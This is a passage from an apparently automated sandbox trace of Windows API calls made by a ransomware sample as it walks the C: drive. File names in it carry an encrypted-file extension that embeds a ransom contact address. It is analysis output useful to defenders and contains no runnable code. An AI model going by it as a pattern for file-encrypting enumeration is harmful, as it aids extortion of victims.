ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c4654a7, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c4b1999, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x233d2, dwReserved0=0x0, dwReserved1=0x756, cFileName="GetCurrentOOBE.dll.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~1.ACT")) returned 1 [0134.652] GetLastError () returned 0x12 [0134.652] SetLastError (dwErrCode=0x12) [0134.652] GetLastError () returned 0x12 [0134.652] SetLastError (dwErrCode=0x12) [0134.652] GetLastError () returned 0x12 [0134.652] SetLastError (dwErrCode=0x12) [0134.652] GetLastError () returned 0x12 [0134.652] SetLastError (dwErrCode=0x12) [0134.652] GetLastError () returned 0x12 [0134.652] SetLastError (dwErrCode=0x12) [0134.652] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.653] SetLastError (dwErrCode=0x12) [0134.653] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.654] SetLastError (dwErrCode=0x12) [0134.654] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.655] SetLastError (dwErrCode=0x12) [0134.655] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] GetLastError () returned 0x12 [0134.656] SetLastError (dwErrCode=0x12) [0134.656] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x756, cFileName="GetCurrentRollback.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="GETCUR~2.ACT")) returned 1 [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.657] SetLastError (dwErrCode=0x12) [0134.657] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] GetLastError () returned 0x12 [0134.658] SetLastError (dwErrCode=0x12) [0134.658] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c73a4a4, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c73a4a4, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c73a4a4, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x362, dwReserved0=0x0, dwReserved1=0x756, cFileName="PartnerSetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PARTNE~1.ACT")) returned 1 [0134.658] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x142, dwReserved0=0x0, dwReserved1=0x756, cFileName="preoobe.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="PREOOB~1.ACT")) returned 1 [0134.658] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x756, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 1 [0134.658] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c760448, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c760448, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c760448, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x242, dwReserved0=0x0, dwReserved1=0x756, cFileName="SetupComplete.cmd.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="SETUPC~1.ACT")) returned 0 [0134.659] FindClose (in: hFindFile=0x1326f58 | out: hFindFile=0x1326f58) returned 1 [0134.659] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43818a0 | out: hHeap=0x2cb0000) returned 1 [0134.659] FindNextFileW (in: hFindFile=0x1327358, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0134.659] FindClose (in: hFindFile=0x1327358 | out: hFindFile=0x1327358) returned 1 [0134.659] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4371898 | out: hHeap=0x2cb0000) returned 1 [0134.660] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0134.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName=".", cAlternateFileName="")) returned 0x1326f58 [0134.661] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="..", cAlternateFileName="")) returned 1 [0134.661] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0134.661] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x12f7a5a, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x16, ftLastWriteTime.dwLowDateTime=0x2, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x555, cFileName="\xe274\xffff\x557", cAlternateFileName="\xfbdc\x457\x1898\x437\x5c\x5c\x3f\x5c\x18c0\x437\xf6a8\x457\x39c8\x115\x08\x01\x18a0\x437")) returned 0xffffffff [0134.662] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43818a0 | out: hHeap=0x2cb0000) returned 1 [0134.662] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0134.662] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x555, cFileName=".", cAlternateFileName="")) returned 0x1327598 [0134.662] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x555, cFileName="..", cAlternateFileName="")) returned 1 [0134.662] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ac3fed, ftCreationTime.dwHighDateTime=0x1d53298, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x555, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0134.662] SetEvent (hEvent=0x4e8) returned 1 [0134.662] ResetEvent (hEvent=0x4ec) returned 1 [0134.662] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x555, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 1 [0134.662] FindNextFileW (in: hFindFile=0x1327598, lpFindFileData=0x457f448 | out: lpFindFileData=0x457f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c7d2e4e, ftCreationTime.dwHighDateTime=0x1d5328f, ftLastAccessTime.dwLowDateTime=0x7c7d2e4e, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x7c7d2e4e, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x555, cFileName="desktop.ini.id[B4197730-0115].[fileisafe@tuta.io].actin", cAlternateFileName="DESKTO~1.ACT")) returned 0 [0134.662] FindClose (in: hFindFile=0x1327598 | out: hFindFile=0x1327598) returned 1 [0134.663] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x43818a0 | out: hHeap=0x2cb0000) returned 1 [0134.663] FindNextFileW (in: hFindFile=0x1326f58, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7ac3fed, ftLastAccessTime.dwHighDateTime=0x1d53298, ftLastWriteTime.dwLowDateTime=0x7ac3fed, ftLastWriteTime.dwHighDateTime=0x1d53298, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0134.663] FindClose (in: hFindFile=0x1326f58 | out: hFindFile=0x1326f58) returned 1 [0134.663] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x4371898 | out: hHeap=0x2cb0000) returned 1 [0134.663] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0134.663] FindNextFileW (in: hFindFile=0x1327498, lpFindFileData=0x457f950 | out: lpFindFileData=0x457f950*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x457fb78, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0134.664] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*", lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName=".", cAlternateFileName="")) returned 0x13272d8 [0135.254] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x83c6e724, ftLastAccessTime.dwHighDateTime=0x1d5328f, ftLastWriteTime.dwLowDateTime=0x83c6e724, ftLastWriteTime.dwHighDateTime=0x1d5328f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="..", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1025", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1028", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1029", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1030", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1031", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1032", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1033", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1035", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1036", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1037", cAlternateFileName="")) returned 1 [0135.259] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e0055, dwReserved1=0x31, cFileName="1038", cAlternateFileName="")) returned 1 [0135.260] FindNextFileW (in: hFindFile=0x13272d8, lpFindFileData=0x457f6cc | out: lpFindFileData=0x457f6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, 